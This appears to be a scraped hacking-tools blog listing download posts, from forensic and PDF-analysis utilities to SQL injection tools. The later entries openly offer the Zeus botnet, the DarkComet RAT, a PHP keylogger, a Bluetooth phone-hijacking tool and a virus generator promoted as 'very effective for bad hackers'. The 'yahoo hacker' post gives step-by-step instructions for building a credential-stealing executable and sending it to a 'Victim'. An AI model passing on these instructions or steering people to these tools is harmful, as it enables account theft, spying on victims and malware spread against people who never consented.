PANBuster

06:43 ---
PANBuster is a command-line tool allowing to easily search for credit card numbers stored in clear-text on a system.
As required by the PCI DSS standard, Primary Account Numbers (PAN) – also known as “credit card numbers” – must never be stored without strong encryption and a proper keys management.
PANBuster is provided to help PCI QSA, system administrators, developpers, auditors and forensics identify clear-text PAN with minimum false-positive detections.

DOWNLOAD AND SOURCE

peepdf

06:33 ---
peepdf is a Python tool to explore PDF files in order to find out if the file can be harmful or not. The aim of this tool is to provide all the necessary components that a security researcher could need in a PDF analysis without using 3 or 4 tools to make all the tasks. With peepdf it's possible to see all the objects in the document showing the suspicious elements, supports all the most used filters and encodings, it can parse different versions of a file, object streams and encrypted files. With the installation of Spidermonkey and Libemu it provides Javascript and shellcode analysis wrappers too. Apart of this it's able to create new PDF files and to modify existent ones

source and download

SpyBHORemover

05:49 ---
SpyBHORemover (previously called BHORemover) is the advanced tool to explore and eliminate malicious BHO's from the system. BHO stands for 'Browser Helper Objects' which are plugins written for 'Internet Explorer' to enhance its capabilities. Often this feature is being misused by many spyware programs to monitor user's browsing habits and to steal the users credentials silently. Also some of the BHO's slow down the system considerably.

SpyBHORemover helps in quick identification and elimination of such spy BHO's present in the system. It not only performs heuristic based threat analysis but also provides online threat verification mechanism which makes it easy to differentiate between legitimate and malicious BHOs.

It also features 'Backup & Restore' feature which makes it easy to remove and re-install the BHO any number of times. Users no longer have to worry about accidental removal of BHO as all removed BHOs are automatically backed up which can then be restored from 'Removed BHO List'. It also comes with a unique feature to completely enable/disable all installed BHOs at one shot.

Current version comes with 'Setup Wizard' for local Installation & Uninstallation of the software. It also includes automatic software updater to detect new versions.

SpyBHORemover works on wide range of platforms starting from Windows XP to latest operating system, Windows 7.




Features of SpyBHORemover

Here are the highlights of some of the salient features of SpyBHORemover which makes it special.
  • Automatically scan & display all installed and previously removed BHOs instantly.
  • 'Advanced Threat Analysis' for each installed BHO using the built-in heuristic mechanism.
  •  Color based threat representation for quick identification and separation of BHOs based on various threat levels.
  •  New 'Backup & Restore' feature enables user to remove and re-install BHO as many times without any worries.
  •  Shows all running processes having the selected BHO DLL and provides option to Kill the process or Remove the DLL from such process.
  •  Unique feature to completely enable/disable ALL installed BHOs for the current user at one shot.
  •  'Online Threat Verification' of malicious BHO using any of the following popular online portals.

    • VirusTotal (www.VirusTotal.com)
    • ThreatExpert (www.ThreatExpert.com)
    • ProcessLibrary (www.ProcessLibrary.com)
  •  One click BHO removal option to remove the selected BHO instantly.
  •  Right click menu option for all the lists for quickly execution desired action.
  •  View detailed properties of selected BHO DLL through double click or right click menu options.
  •  Quickly jump to corresponding BHO location in Registry using Regedit tool for selected BHO.
  •  Export the complete BHO scan report along with threat analysis information to standard HTML format for offline analysis.
  •  Displays detailed information for each installed BHO

    • BHO Class Name
    • Threat Analysis Information
    • Company
    • Product Name
    • Install Date
    • CLSID of the BHO
    • BHO File Path
  •  Enriched GUI interface with user friendly options and cool buttons.
  •  Sort feature to arrange the displayed BHO's based on various parameters such as BHO name/threat level/company/product name/date/clsid/dll path.
  •  Does not require any installation as it is standalone portable tool and can be run directly on any 
  • system. 
      
How to use SpyBHORemover

Here is the brief usage information.
  •  Run SpyBHORemover on your system and it will automatically list all installed BHO's on the system as shown in the screenshot 1 below.
  •  It shows each of the installed BHO with different colors based on the threat levels which helps in distinguishing between malicious and legitimate BHO.
  •  Once you click on any of the BHO, it will display the 'Process List' at the bottom showing all the running processes having the selected BHO DLL.
  •  Then you can choose to Kill such process or Remove the BHO DLL from that process using right click menu options.
  •  For any suspicious BHO you can right click on its entry which will display popup menu with more options. Then you can choose 'Check online' option to perform online threat verification.
  •  To remove any of the malicious BHO, just click on 'Remove' button which will instantly disable it and store the entry in the backup list.
  •  If you have accidently removed the BHO or if you just want to re-install any previous removed BHO then you can select it from the 'Removed BHO List' and click on 'Restore' button to re-install it.
  •  Alternatively you can enable/disable all BHO's at one shot using the 'Enable/Disable BHO' button at the bottom.
  •  Finally you can export the entire scan report with all details to HTML file using 'Export' button.
Note that you have to run SpyBHORemover as administrator to remove or restore the BHO. Otherwise you will be only able to view installed and removed BHO list. Any attempt to remove or restore BHO will fail due to insufficient privileges.
 download and source

BadAss 0.4 Beta

08:15 ---
BadAss is a Ruby script that makes it very easy to perform cracking attacks, port scanning, and more.
Changes: New ruby script added sqlmap.rb, a very simple interface for sqlmap dorking. 
 
download and source

Text to Audio

07:12 ---
  1. Open Notepad file on your Windows PC.
  2. Copy and paste the below mentioned code :
      Dim msg, sapi msg=InputBox("Enter your text for conversion–www.techvorm.com","TechVorm Text-To-Audio Converter") Set sapi=CreateObject("sapi.spvoice") sapi.Speak msg
  3. Save this file with any name with .vbs as extension. For eg. hackers-arsenal.vbs

PHP Vulnerability Hunter

06:50 ---
                                                   



This is the application that detected almost all of the web application vulnerabilities listed on the advisories page. PHP Vulnerability Hunter is an advanced automated whitebox fuzz testing tool capable of triggering a wide range of exploitable faults in PHP web applications. Minimal configuration is necessary to begin a scan; PHP Vulnerability Hunter doesn’t even need a user specified starting URI.

download trial version

100 linux tips and tricks

06:43 ---
these book covers about a hundred Linux tips and tricks.


download and source

WinSniff

13:21 ---
                                         WinSniff in Action



WinSniff is an application for capturing packets on the network.
It displays all the packets transmitted on the local network and
gives detailed information about each header in the packet.

Requirement: Winpcap library

download link 

SSLCert Scanner

13:08 ---
                                                   SCREEN SHOT






SSLCertScanner is the FREE network based SSL certificate scanner software. It can remotely scan SSL certificate on any host either on the intranet or internet. It can also scan single host or multiple hosts at a time. Once the SSL certificate is discovered, SSLCertScanner automatically validates it by checking for expiry date


download source

Auto Screen Capture 1.0

12:56 ---



Appnimi AutoScreenCapture is the FREE tool to automatically record the screenshots of your Desktop at regular intervals of time.It works on wide range of operating systems starting from Windows 98 to latest, Windows 7.

SOURCE

HashGenerator 1.0

08:15 ---
HashGenerator is the FREE universal hash generator tool which automates the generation of 14 different type of hashes or checksums. It support most of the popular hashes including MD5 family, SHA family, BASE64, CRC32, ROT13, RIPEMD, ALDER32, HAVAL, WHIRLPOOL etc.

HashGenerator is fully portable tool which can be directly run anywhere without installing locally. It also comes with Installer for those who wants to install it locally and use it on regular basis.

download

Port Scanner 2.0

08:02 ---
A fast TCP port scanner based on popular HALF-OPEN scanning or SYN scanning method. This technique makes the scanning process faster than the traditional CONNECT method. It uses winpcap library to capture the network packets.


download here

Netsparker CE v1.9.0.5

06:39 ---

Netsarker can crawl, attack and identify vulnerabilities in all custom web applications regardless of the platform and the technology they are built on, just like an actual attacker.

It can identify web application vulnerabilities like SQL Injection, Cross-site Scripting (XSS), Remote Code Execution and many more. It has exploitation built on it, for example you can get a reverse shell out of an identified SQL Injection or extract data via running custom SQL queries.

Pangolin Automated SQLi Testing Tool

06:31 ---
Pangolin is a penetration testing, SQL Injection test tool on database security. It finds SQL Injection vulnerabitlities.Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user”s specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more.
download it here

FacebookPasswordDecryptor

06:19 ---
"FacebookPasswordDecryptor - small, simple, free, and yet truly reliable application that helps you recover stored Facebook account passwords, quickly and easily. Truly great little tool that works like a charm. Highly-recommended."


Disclaimer

FacebookPasswordDecryptor is designed for good purpose to help users to recover the lost Facebook account password. Like any tool its use either good or bad, depends upon the user who uses it. However author is not responsible for any damage caused due to misuse of this tool.






DOWNLOAD IT HERE

Website Extractor

06:04 ---
 Website Extractor gives you complete control over including and excluding downloads from individual servers, folders, URLs, and files using keywords.
# Website Extractor can download many websites simultaneously.
Transfer whole websites to CD-ROM or floppy
Another big benefit of the program is it changes html-links to relative names. In other words, it turns web addresses (URLs) into addresses that work on your computer. This means you can easily move whole websites or information to CD-ROM, floppy disk, or to another hard drive.

registered version download here

how to edit any website

04:40 ---
1. goto the website you want to edit

2. copy and post the below code to the address bar. bam enjoy editing

code
javascript:document.body.contentEditable='true'; document.designMode='on'; void 0

yahoo hacker

05:55 ---
1.First of all Download and extract this file 
2.In the extracted folder you'll be having 2 main files called a "Builder.exe" and "Stub.exe".DON'T RUN Stub.exe.Just open "Builder.exe" and fill in your login details and password  and then Check your details to make sure nothing goes wrong.

3.Now Name your file as "anything.exe" and click on "Build"

4.Now close the "Builder.exe" and you'll see that a new file has veen created with your name "Something.exe"

5.Listen carefully now,your supposed to send ONLY "anything.exe" to your Victim to hack his email ID.DO NOT SEND Stub.exe or Builder.exe.

6.The only thing left now is by testing it! Send it to your friend,and once he's pranked and enter's his details on the software.it will be sent to the email address that you provided earlier!

hackers-arsenal. relax, learn enjoy.

zeus botnet

06:53 ---
by downloading this you agree that you will not use it to harm anybody and if you do youa assume full responsibilty of your action.

download zeus botnet here

online admin page finder

06:31 ---
this online admin page finder works like magic check it out

DarkCometRAT32FWB.zip

06:24 ---
this is a new version of dark comet rat

enjoy
DOWNLOAD

11 FBI TOOLS.RAR

06:13 ---
This file includes:

- ADS Locator (Alternate Data Streams)
- Disc Investigator 1.4 (File-Slack-Analyze)
- Historian 1.4 (Browser Analyze)
- Live View 0.6 (System Analyze)
- MUI Cacheview 1.00 (Registry Analyze)
- Networkminer 0.85 (Network Analyze)
- Regripper 2.02 (Registry Analyze)
- Systemreport 2.54 (PC Analyze)
- USB-History R1 (USB-Stick-Analyze)
- Windows File Analyzer (File Analyze)
- Winpcap 4.02 (Network)


DOWNLOAD LINK

super bluetooth hack v1.8.jar

05:52 ---
 Thing you can do with this tool

nformations: display informations about battery, network, sim card
- Ringing: playing sounds of incoming call, alarm clock ..
- Calls: dialing number, ending a call..
- Language: change language in phone
- Keys, Pressed keys: pressing and watching pressed keys
- Contacts
- Read SMS Messages/Send
- Silent mode: turning on or off
- Phone functionality: turning off the network / phone
- Alarms:
- Clock: change date and time
- Lock Their Phone


and so much more 
work perfectly on nokia and Sony ericsson phones


 DOWNLOAD

AK-47 Hacking Kit v1.0 Beta

09:43 ---
hello guys download this collection of tools called the AK-47


 DOWNLOAD

havij 1.13

08:38 ---
http://rapidshare.com/files/429247633/Havij_1.13_Free.rar

Net Tools 5.0

08:22 ---

Net Tools 5.0 (build 70) contains a whole variety of network tools. Here is a list of the most important tools:
1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8 Trace Route (2 ways)
9) TCP/IP Configuration
10) Online - Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
95) Hash MD5 Checker
96) Port Connect - Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer's IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, ... All protocols supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) GeoLocate IP
154) Google PageRank Calculator
155) Google Link Crawler (Web Result Grabber)
156) Network Adapter Binder
157) Remote LAN PC Lister
158) Fast Sinusoidal Encryption
159) Software Scanner
160) Fast FTP Client
161) Network Traffic Analysis
162) Network Traffic Visualiser
163) Internet Protocol Scanner
164) Net Meter (Bandwidth Traffic Meter)
165) Net Configuration Switcher
166) Advanced System Hardware Info
167) Live System Information
168) Network Profiler
169) Network Browser
170) Quick Website Maker and Web Gallery Creator
171) Remote PC Shutdown
172) Serial Port Terminal
173) Standard Encryptor
174) Tray Minimizer
175) Extra Tools (nmap console & win32 version)

Download:
Password:
Code:
www.chemprojects.org 

PHP Keylogger 4.0.rar.

07:34 ---
this is a good keylogger try it out.

download

WITOOL Web SQL injection

07:57 ---
Features of WITOOL -
-ORACLE Injection
-Injection Auto script
-Save XML from data
-Inquery (View, Function object)
-SQL SERVER Injection
-Error base
-Injection script customizing
-Inquery (Db system info, Auth, Tables, Columns, Data)

There are many effective sql injection tools. WITOOL focuses more on the connection between database and web application. So after basic database enumeration using web page as the frontend, we can focus on sql injection attacks

http://sourceforge.net/projects/witool/files/

social engineering toolkit

08:14 ---
The Social-Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of pentesting. It’s main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed. Currently SET has two main methods of attack, one is utilizing Metasploit payloads and Java-based attacks by setting up a malicious website (which you can clone whatever one you want) that ultimately delivers your payload. The second method is through file-format bugs and e-mail phishing. The second method supports your own open-mail relay, a customized sendmail open-relay, or Gmail integration to deliver your payloads through e-mail. The goal of SET is to bring awareness to the often forgotten attack vector of social-engineering.





DOWNLOD IT HERE

DELmE's Batch Virus Generator v1.0

13:29 ---
This tool is a virus creater. It will create very proffesional virus. Never test any virus on your PC. Very effective for bad hackers. All credits go to DELmE

[download link]